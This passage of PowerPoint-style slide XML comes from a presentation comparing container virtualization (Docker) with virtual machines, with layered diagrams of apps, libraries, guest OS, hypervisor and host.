                  <a:pt x="9474199" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9522533" y="4869"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9567546" y="18837"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9608277" y="40940"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9643760" y="70215"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9673035" y="105698"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9695138" y="146429"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9709106" y="191442"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9713976" y="239775"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9713976" y="1198879"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9709106" y="1247213"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9695138" y="1292226"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9673035" y="1332957"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9643760" y="1368440"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9608277" y="1397715"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9567546" y="1419818"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9522533" y="1433786"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9474199" y="1438655"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="239775" y="1438655"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="191442" y="1433786"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="146429" y="1419818"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="105698" y="1397715"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="70215" y="1368440"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="40940" y="1332957"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18837" y="1292226"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4869" y="1247213"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1198879"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="239775"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="12699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434329" y="4257548"/>
            <a:ext cx="691959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Container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virtualization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cannot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run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different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Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>OS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VMs.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73423" y="5484876"/>
            <a:ext cx="9714230" cy="1297305"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="9714230" h="1297304">
                <a:moveTo>
                  <a:pt x="0" y="216153"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5708" y="166591"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="21969" y="121094"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="47486" y="80960"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="80960" y="47486"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="121094" y="21969"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="166591" y="5708"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="216153" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9497822" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9547384" y="5708"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9592881" y="21969"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9633015" y="47486"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9666489" y="80960"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9692006" y="121094"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9708267" y="166591"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9713976" y="216153"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9713976" y="1080770"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9708267" y="1130332"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9692006" y="1175829"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9666489" y="1215963"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9633015" y="1249437"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9592881" y="1274954"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9547384" y="1291215"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9497822" y="1296924"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="216153" y="1296924"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="166591" y="1291215"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="121094" y="1274954"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="80960" y="1249437"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="47486" y="1215963"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="21969" y="1175829"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5708" y="1130332"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1080770"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="216153"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="12700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116195" y="5938265"/>
            <a:ext cx="755840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Docker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best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known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container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virtualization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product.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47544" y="4003547"/>
            <a:ext cx="899159" cy="89916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47544" y="5682996"/>
            <a:ext cx="899159" cy="900683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36440" y="306451"/>
            <a:ext cx="718439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95">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Application</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-100">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="175">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>and</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-125">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="110">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Container</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-110">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="85">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Virtualization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84220" y="760476"/>
            <a:ext cx="9683496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258824" y="4206240"/>
            <a:ext cx="4395470" cy="1839595"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="4395470" h="1839595">
                <a:moveTo>
                  <a:pt x="3475481" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1839468"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3475481" y="1839468"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4395216" y="919734"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3475481" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="EBF1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14399" y="4595622"/>
            <a:ext cx="3622040" cy="1031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h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75">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E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v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image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present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s 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elements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within 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a </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="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Container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VM.</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:latin typeface="Lucida Sans Unicode"/>
              <a:cs typeface="Lucida Sans Unicode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460233" y="3429253"/>
          <a:ext cx="2999740" cy="4991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1835"/>
                <a:gridCol w="413384"/>
                <a:gridCol w="711834"/>
                <a:gridCol w="413385"/>
                <a:gridCol w="711835"/>
              </a:tblGrid>
              <a:tr h="783589">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="299085" marR="182880" indent="-109855">
                        <a:lnSpc>
                          <a:spcPts val="1670"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="1455"/>
                        </a:spcBef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App  </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr dirty="0" sz="1400" spc="-8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84785">
                    <a:solidFill>
                      <a:srgbClr val="4279A0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4279A0"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnL>
                    <a:lnR w="28575">
                      <a:solidFill>
                        <a:srgbClr val="4279A0"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnR>
                    <a:lnB w="28575">
                      <a:solidFill>
                        <a:srgbClr val="4279A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5"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="1325"/>
                        </a:spcBef>
                      </a:pPr>
                      <a:r>
                        <a:rPr dirty="0" sz="1400" spc="-4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App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  <a:p>
                      <a:pPr algn="ctr">
                        <a:lnSpc>
                          <a:spcPts val="1675"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr dirty="0" sz="1400" spc="-1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A’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68275">
                    <a:solidFill>
                      <a:srgbClr val="4279A0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4279A0"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnL>
                    <a:lnR w="28575">
                      <a:solidFill>
                        <a:srgbClr val="4279A0"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnR>
                    <a:lnB w="28575">
                      <a:solidFill>
                        <a:srgbClr val="4279A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0" marR="182245" indent="-108585">
                        <a:lnSpc>
                          <a:spcPts val="1670"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="1325"/>
                        </a:spcBef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App  </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr dirty="0" sz="1400" spc="1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B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68275">
                    <a:solidFill>
                      <a:srgbClr val="4279A0"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="747775">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="187960" marR="137795" indent="-44450">
                        <a:lnSpc>
                          <a:spcPts val="1670"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="1185"/>
                        </a:spcBef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B</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr dirty="0" sz="1400" spc="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i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ns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/  </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr dirty="0" sz="1400" spc="-3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Libs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50495">
                    <a:lnL w="28575">
                      <a:solidFill>
                        <a:srgbClr val="4279A0"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnL>
                    <a:lnR w="28575">
                      <a:solidFill>
                        <a:srgbClr val="4279A0"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnR>
                    <a:lnT w="28575">
                      <a:solidFill>
                        <a:srgbClr val="4279A0"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnT>
                    <a:lnB w="38100">
                      <a:solidFill>
                        <a:srgbClr val="4279A0"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnB>
                    <a:solidFill>
                      <a:srgbClr val="EE6360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4279A0"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnL>
                    <a:lnR w="28575">
                      <a:solidFill>
                        <a:srgbClr val="4279A0"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnR>
                    <a:lnB w="28575">
                      <a:solidFill>
                        <a:srgbClr val="4279A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7960" marR="137795" indent="-44450">
                        <a:lnSpc>
                          <a:spcPts val="1670"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="1175"/>
                        </a:spcBef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B</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr dirty="0" sz="1400" spc="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i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ns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/  </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr dirty="0" sz="1400" spc="-3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Libs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49225">
                    <a:lnL w="28575">
                      <a:solidFill>
                        <a:srgbClr val="4279A0"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnL>
                    <a:lnR w="28575">
                      <a:solidFill>
                        <a:srgbClr val="4279A0"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnR>
                    <a:lnT w="28575">
                      <a:solidFill>
                        <a:srgbClr val="4279A0"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnT>
                    <a:lnB w="38100">
                      <a:solidFill>
                        <a:srgbClr val="4279A0"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnB>
                    <a:solidFill>
                      <a:srgbClr val="EE6360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4279A0"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnL>
                    <a:lnR w="28575">
                      <a:solidFill>
                        <a:srgbClr val="4279A0"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnR>
                    <a:lnB w="28575">
                      <a:solidFill>
                        <a:srgbClr val="4279A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8595" marR="137160" indent="-44450">
                        <a:lnSpc>
                          <a:spcPts val="1670"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="1110"/>
                        </a:spcBef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B</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr dirty="0" sz="1400" spc="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i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ns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/  </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr dirty="0" sz="1400" spc="-3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Libs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40970">
                    <a:lnL w="28575">
                      <a:solidFill>
                        <a:srgbClr val="4279A0"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnL>
                    <a:lnR w="28575">
                      <a:solidFill>
                        <a:srgbClr val="4279A0"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnR>
                    <a:lnB w="38100">
                      <a:solidFill>
                        <a:srgbClr val="4279A0"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnB>
                    <a:solidFill>
                      <a:srgbClr val="E3B362"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="169602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236854" marR="103505" indent="-125095">
                        <a:lnSpc>
                          <a:spcPts val="1670"/>
                        </a:lnSpc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Gue</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr dirty="0" sz="1400" spc="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s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t  </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr dirty="0" sz="1400" spc="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OS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28575">
                      <a:solidFill>
                        <a:srgbClr val="4279A0"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnL>
                    <a:lnR w="28575">
                      <a:solidFill>
                        <a:srgbClr val="4279A0"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnR>
                    <a:lnT w="38100">
                      <a:solidFill>
                        <a:srgbClr val="4279A0"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnT>
                    <a:lnB w="28575">
                      <a:solidFill>
                        <a:srgbClr val="4279A0"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnB>
                    <a:solidFill>
                      <a:srgbClr val="04668D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4279A0"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnL>
                    <a:lnR w="28575">
                      <a:solidFill>
                        <a:srgbClr val="4279A0"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnR>
                    <a:lnB w="28575">
                      <a:solidFill>
                        <a:srgbClr val="4279A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236854" marR="103505" indent="-125095">
                        <a:lnSpc>
                          <a:spcPts val="1670"/>
                        </a:lnSpc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Gue</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr dirty="0" sz="1400" spc="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s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t  </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr dirty="0" sz="1400" spc="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OS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28575">
                      <a:solidFill>
                        <a:srgbClr val="4279A0"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnL>
                    <a:lnR w="28575">
                      <a:solidFill>
                        <a:srgbClr val="4279A0"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnR>
                    <a:lnT w="38100">
                      <a:solidFill>
                        <a:srgbClr val="4279A0"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnT>
                    <a:lnB w="38100">
                      <a:solidFill>
                        <a:srgbClr val="4279A0"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnB>
                    <a:solidFill>
                      <a:srgbClr val="04668D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4279A0"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnL>
                    <a:lnR w="28575">
                      <a:solidFill>
                        <a:srgbClr val="4279A0"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnR>
                    <a:lnB w="28575">
                      <a:solidFill>
                        <a:srgbClr val="4279A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marL="237490" marR="102870" indent="-125095">
                        <a:lnSpc>
                          <a:spcPts val="1670"/>
                        </a:lnSpc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Gue</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr dirty="0" sz="1400" spc="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s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t  </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr dirty="0" sz="1400" spc="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OS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28575">
                      <a:solidFill>
                        <a:srgbClr val="4279A0"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnL>
                    <a:lnR w="28575">
                      <a:solidFill>
                        <a:srgbClr val="4279A0"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnR>
                    <a:lnT w="38100">
                      <a:solidFill>
                        <a:srgbClr val="4279A0"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnT>
                    <a:lnB w="53975">
                      <a:solidFill>
                        <a:srgbClr val="4279A0"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnB>
                    <a:solidFill>
                      <a:srgbClr val="04668D"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="589026">
                <a:tc gridSpan="5">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="655955">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="1365"/>
                        </a:spcBef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Hype</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr dirty="0" sz="1400" spc="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r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v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i</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr dirty="0" sz="1400" spc="-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s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o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r</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr dirty="0" sz="1400" spc="-1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(</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr dirty="0" sz="1400" spc="-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Ty</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr dirty="0" sz="1400" spc="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p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e</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr dirty="0" sz="1400" spc="-10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20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73355">
                    <a:lnL w="28575">
                      <a:solidFill>
                        <a:srgbClr val="4279A0"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnL>
                    <a:lnR w="28575">
                      <a:solidFill>
                        <a:srgbClr val="4279A0"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnR>
                    <a:lnT w="53975">
                      <a:solidFill>
                        <a:srgbClr val="4279A0"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnT>
                    <a:lnB w="53975">
                      <a:solidFill>
                        <a:srgbClr val="4279A0"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnB>
                    <a:solidFill>
                      <a:srgbClr val="45535F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87501">
                <a:tc grid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Host</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr dirty="0" sz="1400" spc="-8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OS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81610">
                    <a:lnL w="28575">
                      <a:solidFill>
                        <a:srgbClr val="4279A0"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnL>
                    <a:lnR w="28575">
                      <a:solidFill>
                        <a:srgbClr val="4279A0"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnR>
                    <a:lnT w="53975">
                      <a:solidFill>
                        <a:srgbClr val="4279A0"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnT>
                    <a:lnB w="28575">
                      <a:solidFill>
                        <a:srgbClr val="4279A0"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnB>
                    <a:solidFill>
                      <a:srgbClr val="004E7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80644">
                <a:tc grid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Server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74625">
                    <a:lnL w="28575">
                      <a:solidFill>
                        <a:srgbClr val="4279A0"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnL>
                    <a:lnR w="28575">
                      <a:solidFill>
                        <a:srgbClr val="4279A0"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnR>
                    <a:lnT w="28575">
                      <a:solidFill>
                        <a:srgbClr val="4279A0"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnT>
                    <a:lnB w="28575">
                      <a:solidFill>
                        <a:srgbClr val="4279A0"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnB>
                    <a:solidFill>
                      <a:srgbClr val="39405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3159632" y="1933193"/>
            <a:ext cx="9932035" cy="1096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Containers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measured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megabytes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VMs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>
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>are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measured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in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gigabytes.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50">
              <a:latin typeface="Lucida Sans Unicode"/>
              <a:cs typeface="Lucida Sans Unicode"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="3115945">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="80" b="1">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Container</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-85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15" b="1">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>vs.</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-110" b="1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2200" spc="210" b="1">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>VMs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755130" y="3449573"/>
            <a:ext cx="494030" cy="3192780"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="494029" h="3192779">
                <a:moveTo>
                  <a:pt x="493775" y="3192780"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="415722" y="3190682"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="347947" y="3184843"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="294509" y="3175936"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="246888" y="3151632"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="246888" y="1753742"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="234305" y="1740734"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="199266" y="1729438"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="145828" y="1720531"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="78053" y="1714692"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1712595"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="78053" y="1710497"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="145828" y="1704658"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="199266" y="1695751"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="234305" y="1684455"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="246888" y="1671447"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="246888" y="41148"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="259470" y="28139"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="294509" y="16843"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="347947" y="7936"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="415722" y="2097"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="493775" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="28575">
            <a:solidFill>
              <a:srgbClr val="004E7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196329" y="4990592"/>
            <a:ext cx="4699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245" b="1">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>VM</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:latin typeface="Trebuchet MS"/>
              <a:cs typeface="Trebuchet MS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2199873" y="4864861"/>
          <a:ext cx="2999740" cy="3538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100"/>
                <a:gridCol w="419100"/>
                <a:gridCol w="335280"/>
                <a:gridCol w="83819"/>
                <a:gridCol w="424180"/>
                <a:gridCol w="427355"/>
                <a:gridCol w="427989"/>
                <a:gridCol w="423544"/>
              </a:tblGrid>
              <a:tr h="1334262">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="42164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App</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr dirty="0" sz="1400" spc="-8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92075" vert="vert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4279A0"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="40513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App</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr dirty="0" sz="1400" spc="-8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A’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92075" vert="vert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4279A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419734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App</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr dirty="0" sz="1400" spc="-8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B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91440" vert="vert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4279A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0640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App</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr dirty="0" sz="1400" spc="-8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B’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96520" vert="vert">
                    <a:lnL w="28575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4279A0"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="40640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App</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr dirty="0" sz="1400" spc="-8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B’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96520" vert="vert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4279A0"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="40640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App</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr dirty="0" sz="1400" spc="-8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B’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96520" vert="vert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4279A0"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="40640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App</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr dirty="0" sz="1400" spc="-8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B’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92075" vert="vert">
                    <a:lnL w="381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4279A0"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="419862">
                <a:tc gridSpan="3">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="209550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400" spc="-4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Bins/Libs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95885">
                    <a:lnL w="28575">
                      <a:solidFill>
                        <a:srgbClr val="4279A0"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnL>
                    <a:lnR w="28575">
                      <a:solidFill>
                        <a:srgbClr val="4279A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4279A0"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnB>
                    <a:solidFill>
                      <a:srgbClr val="EE636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5">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="51625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dirty="0" sz="1400" spc="-4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Bins/Libs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93345">
                    <a:lnL w="28575">
                      <a:solidFill>
                        <a:srgbClr val="4279A0"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnL>
                    <a:lnR w="28575">
                      <a:solidFill>
                        <a:srgbClr val="4279A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4279A0"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnB>
                    <a:solidFill>
                      <a:srgbClr val="E3B36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89026">
                <a:tc gridSpan="8">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="881380">
